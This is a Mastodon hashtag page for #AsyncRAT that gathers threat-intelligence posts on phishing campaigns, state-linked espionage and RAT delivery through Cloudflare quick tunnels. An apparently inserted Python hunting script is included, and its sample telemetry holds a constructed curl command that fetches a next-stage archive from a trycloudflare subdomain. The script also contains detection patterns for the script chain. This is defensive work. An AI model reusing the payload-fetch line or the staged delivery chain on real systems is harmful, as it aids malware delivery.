mstdn.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
A general-purpose Mastodon server with a 500 character limit. All languages are welcome.


#AsyncRAT


Detecting Multi-Stage Infection Chains Madness

This analysis examines a complex multi-stage attack exploiting a resilient network infrastructure known as 'Cloudflare tunnel infrastructure to deliver multiple RATs' since February 2024. The infection chain involves multiple steps, including phishing emails with malicious attachments, execution of various file types (LNK, HTA, BAT, Python scripts), and eventual delivery of AsyncRAT. The attackers employ various evasion techniques and leverage public services like TryCloudflare and DynDNS. The report highlights the importance of combining cyber threat intelligence with detection rules to enhance security capabilities against evolving threats. It also provides detailed information on the attack stages, detection opportunities, and associated indicators of compromise.

Pulse ID: 68076448a507880b9128c2a6
Pulse Link: otx.alienvault.com/pulse/68076
Pulse Author: AlienVault
Created: 2025-04-22 09:41:28

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue - Open Threat Exchange: Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

Phishing campaign impersonates Booking.com, delivers a suite of credential-stealing malware

A phishing campaign targeting organizations in the hospitality industry has been identified, impersonating Booking.com and using the ClickFix social engineering technique to deliver multiple credential-stealing malware. The campaign, tracked as Storm-1865, targets individuals likely to work with Booking.com in North America, Oceania, Asia, and Europe. The attack uses fake emails and webpages to trick users into executing malicious commands, leading to the download of various malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. The campaign aims to steal financial data and credentials for fraudulent use, showing an evolution in the threat actor's tactics to bypass conventional security measures.

Pulse ID: 67fb93e8ebc93d6ded395f39
Pulse Link: otx.alienvault.com/pulse/67fb9
Pulse Author: AlienVault
Created: 2025-04-13 10:37:28

Be advised, this data is unverified and should be considered preliminary. Always do further verification.


#ESETresearch has uncovered the #MirrorFace Operation AkaiRyū, which extends the group’s usual focus beyond Japan into Europe. The initial lure centered around Expo 2025 in Japan, compromising a Central European diplomatic institute.
welivesecurity.com/en/eset-res

Surprisingly, #MirrorFace used #ANEL – a backdoor historically linked only to #APT10 – highlighting a shift in the group’s tactics and reinforcing suspicions that MirrorFace could be part of the APT10 umbrella.
Operation AkaiRyū began with targeted spearphishing emails referencing the victim’s past correspondence and Expo 2025, persuading recipients to download malicious attachments.
Once the files were opened, a layered compromise chain ensued. Collaborating with the victim allowed us to perform in-depth analysis, shedding light on MirrorFace’s post-compromise behavior – from credential harvesting to dropping additional tools for lateral movement.

#MirrorFace used an intricate execution chain to stealthily run a highly tweaked #AsyncRAT within #WindowsSandbox, hampering detection efforts. This is the first time we’ve seen MirrorFace employ AsyncRAT.
In another twist, #MirrorFace utilized #VSCode remote tunnels, a tactic enabling covert access and command execution on compromised machines. This approach has also been seen with other China-aligned cyberespionage groups.
The group primarily leveraged #ANEL as a first-stage backdoor; #HiddenFace – MirrorFace’s flagship backdoor – was dropped later in the attack to bolster persistence. Notably absent this time was #LODEINFO, which #MirrorFace typically employs.

We presented our findings about Operation AkaiRyū conducted by #MirrorFace at @jpcert_ac on January 22, 2025: jsac.jpcert.or.jp.
IoCs available in our GitHub repo: github.com/eset/malware-ioc/tr

A new campaign, dubbed Desert Dexter, is targeting the Middle East & North Africa, impacting ~900 victims since fall '24! 😱 They're using social media & altered AsyncRAT malware to steal data & crypto. Watch out for malicious ads & file-sharing links! ⚠️ #cybersecurity #malware #AsyncRAT #DesertDexter #newz

thehackernews.com/2025/03/dese

The Hacker News · Desert Dexter Targets 900 Victims Using Facebook Ads and Telegram Malware Links: A new AsyncRAT malware variant has infected 900 victims in MENA via Facebook ads and Telegram links.

Happy Friday everyone!

I feel like this has become a weekly PSA, but Kaspersky Securelist researchers have identified hundreds of #GitHub projects that are serving up malicious code designed to steal saved credentials, cryptocurrency wallets, and browsing history. Sometimes this execution of code leads to the #AsyncRAT or #Quasar backdoor, but the threat remains the same: blindly executing code from GitHub. I hope you enjoy and Happy Hunting!

The GitVenom campaign: cryptocurrency theft using GitHub

securelist.com/gitvenom-campai

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Kaspersky · The GitVenom campaign: cryptocurrency theft using GitHub, by Georgy Kucherin

Happy Wednesday everyone!

#AsyncRAT made headlines in a report published by the Forcepoint X-Labs research team. A significant finding was that the malware leveraged payloads delivered through suspicious TryCloudflare quick tunnels and Python packages. While I am familiar with Python packages being weaponized during a supply chain attack, the topic of quick tunnels eluded me. So, I looked it up and found that "Developers can use the TryCloudflare tool to experiment with Cloudflare Tunnel without adding a site to Cloudflare's DNS. TryCloudflare will launch a process that generates a random subdomain on trycloudflare.com. Requests to that subdomain will be proxied through the Cloudflare network to your web server running on localhost." [developers.cloudflare.com/clou]

This was interesting as it seemed to be a workaround or possibly a replacement for domain generating algorithms (DGAs). And if I am misunderstanding this technology, someone please enlighten me!

Behaviors:
Initial Access:
Phishing: Spearphishing Link - T1566.002

Execution:
Command And Scripting Interpreter: JavaScript - T1059.007
- A JavaScript file was executed after an LNK file was delivered and executed, and it links to a .BAT file.

Command And Scripting Interpreter: Windows Command Shell - T1059.003
- A .BAT file is executed that leads to another zip file that contains a python script used to execute the AsyncRAT malware.

Command And Scripting Interpreter: Python - T1059.006
- A Python file is used to execute the AsyncRAT malware.

As usual, go show the authors some love and check out the details I excluded and get hunting on those behaviors! Enjoy and Happy Hunting!

AsyncRAT Reloaded: Using Python and TryCloudflare for Malware Delivery Again
forcepoint.com/blog/x-labs/asy

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Cloudflare Docs · Quick Tunnels (Cloudflare Zero Trust docs): Developers can use the TryCloudflare tool to experiment with Cloudflare Tunnel without adding a site to Cloudflare's DNS. TryCloudflare will launch a process that generates a random subdomain on trycloudflare.com. Requests to that subdomain will be proxied through the Cloudflare network to your web server running on localhost.
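The behaviors listed in the post above (LNK → JavaScript → BAT → Python, with the next stage pulled from a TryCloudflare quick tunnel, the same delivery pattern summarized in the "Detecting Multi-Stage Infection Chains Madness" OTX pulse earlier on this page) turned into hunt logic, as an added example that is not code from Forcepoint, AlienVault/OTX or Intel 471. It assumes Sysmon-style fields for Event ID 1 (process create: image, command line, pid/ppid) and Event ID 22 (DNS query: image, query), that pid/ppid are unique per host, and that only the official cloudflared.exe client legitimately resolves trycloudflare.com names; the events, hostnames and tunnel subdomains are constructed for the example.

```python
"""Hunt the LNK -> JavaScript -> BAT -> Python -> AsyncRAT delivery chain and
TryCloudflare quick-tunnel lookups in Sysmon-style telemetry.

Added example; not code from Forcepoint, AlienVault/OTX or Intel 471.
Field names loosely follow Sysmon Event ID 1 (process create) and
Event ID 22 (DNS query). Every event below is constructed, not a real log.
"""
import re

# --- constructed sample telemetry (assumption: pid/ppid unique per host) ---
EVENTS = [
    {"id": 1, "host": "WS01", "pid": 400, "ppid": 100,
     "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # LNK double-click -> wscript runs the JavaScript dropper
    {"id": 1, "host": "WS01", "pid": 410, "ppid": 400,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe //B "C:\Users\u\AppData\Local\Temp\invoice.js"'},
    # JavaScript -> cmd.exe runs the BAT stage
    {"id": 1, "host": "WS01", "pid": 420, "ppid": 410,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\run.bat"'},
    # BAT fetches the next archive through a quick tunnel (constructed subdomain)
    {"id": 1, "host": "WS01", "pid": 425, "ppid": 420,
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -s -o stage.zip https://hello-brown-cat-tree.trycloudflare.com/s.zip"},
    {"id": 22, "host": "WS01", "pid": 425,
     "image": r"C:\Windows\System32\curl.exe",
     "query": "hello-brown-cat-tree.trycloudflare.com"},
    # BAT -> bundled Python interpreter runs the AsyncRAT loader
    {"id": 1, "host": "WS01", "pid": 430, "ppid": 420,
     "image": r"C:\Users\u\AppData\Local\Temp\py\python.exe",
     "cmd": r'python.exe "C:\Users\u\AppData\Local\Temp\py\loader.py"'},
    # Benign noise: a developer testing a local site with the official client
    {"id": 22, "host": "DEV02", "pid": 900,
     "image": r"C:\Program Files\cloudflared\cloudflared.exe",
     "query": "quiet-river-lamp-dawn.trycloudflare.com"},
    {"id": 1, "host": "DEV02", "pid": 910, "ppid": 200,
     "image": r"C:\Python312\python.exe", "cmd": "python.exe manage.py runserver"},
]

# Chain stages, youngest process first: (image regex, command-line regex).
STAGES = [
    (re.compile(r"^pythonw?(\d+)?\.exe$", re.I), re.compile(r"\.py\b", re.I)),        # T1059.006
    (re.compile(r"^cmd\.exe$", re.I),            re.compile(r"\.(bat|cmd)\b", re.I)),  # T1059.003
    (re.compile(r"^[wc]script\.exe$", re.I),     re.compile(r"\.(js|jse)\b", re.I)),   # T1059.007
]

# Quick tunnels live under trycloudflare.com; extend this for other rendezvous domains.
TUNNEL_RE = re.compile(r"(^|\.)trycloudflare\.com$", re.I)
# Assumption: only the official client should ever resolve these names.
TUNNEL_ALLOWED_IMAGES = {"cloudflared.exe"}


def _basename(path):
    """Last component of a Windows path."""
    return path.rsplit("\\", 1)[-1]


def find_script_chains(events):
    """Return [(host, [pids youngest..oldest])] where a Python process has a
    cmd.exe/.bat parent and a wscript|cscript/.js grandparent."""
    procs = {(e["host"], e["pid"]): e for e in events if e["id"] == 1}
    hits = []
    for start in procs.values():
        chain, cur = [], start
        for img_re, arg_re in STAGES:
            if cur is None or not img_re.search(_basename(cur["image"])) \
                    or not arg_re.search(cur["cmd"]):
                break
            chain.append(cur["pid"])
            cur = procs.get((cur["host"], cur["ppid"]))  # walk to the parent
        else:  # every stage matched without a break
            hits.append((start["host"], chain))
    return hits


def find_tunnel_beacons(events):
    """Return [(host, image, query)] for trycloudflare.com lookups made by
    anything other than the allow-listed tunnel client."""
    return [
        (e["host"], _basename(e["image"]), e["query"])
        for e in events
        if e["id"] == 22 and TUNNEL_RE.search(e["query"])
        and _basename(e["image"]).lower() not in TUNNEL_ALLOWED_IMAGES
    ]


if __name__ == "__main__":
    for host, pids in find_script_chains(EVENTS):
        print(f"[chain]  {host}: python <- cmd(.bat) <- wscript(.js), pids {pids}")
    for host, image, query in find_tunnel_beacons(EVENTS):
        print(f"[tunnel] {host}: {image} resolved {query}")
```

Run it as-is to see the two hits on WS01 and none on DEV02; in practice, replace EVENTS with Sysmon 1/22 events exported from your SIEM. The chain rule keys on ancestry plus the script extension in each stage's command line rather than on any one hash or subdomain, which is why the random trycloudflare.com labels do not matter: the detection is the domain suffix combined with a requesting process that is not the tunnel client.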

🚨 Did you know that cybercriminals are now using Bitbucket to distribute Remote Access Trojans like AsyncRAT? 🚨

Attackers are exploiting trusted code-sharing platforms to hide their malicious payloads in plain sight. By hosting malware on Bitbucket, they leverage its legitimacy to bypass security defenses!

🛡️ Cybersecurity Tip: Monitor unexpected downloads from code repositories like Bitbucket. Even reputable platforms can harbor threats if used maliciously.

What are your thoughts on attackers misusing legitimate platforms for cybercrime? Have you ever encountered suspicious repositories?

Learn how AsyncRAT is exploiting Bitbucket and what you can do to protect yourself: guardiansofcyber.com/cybersecu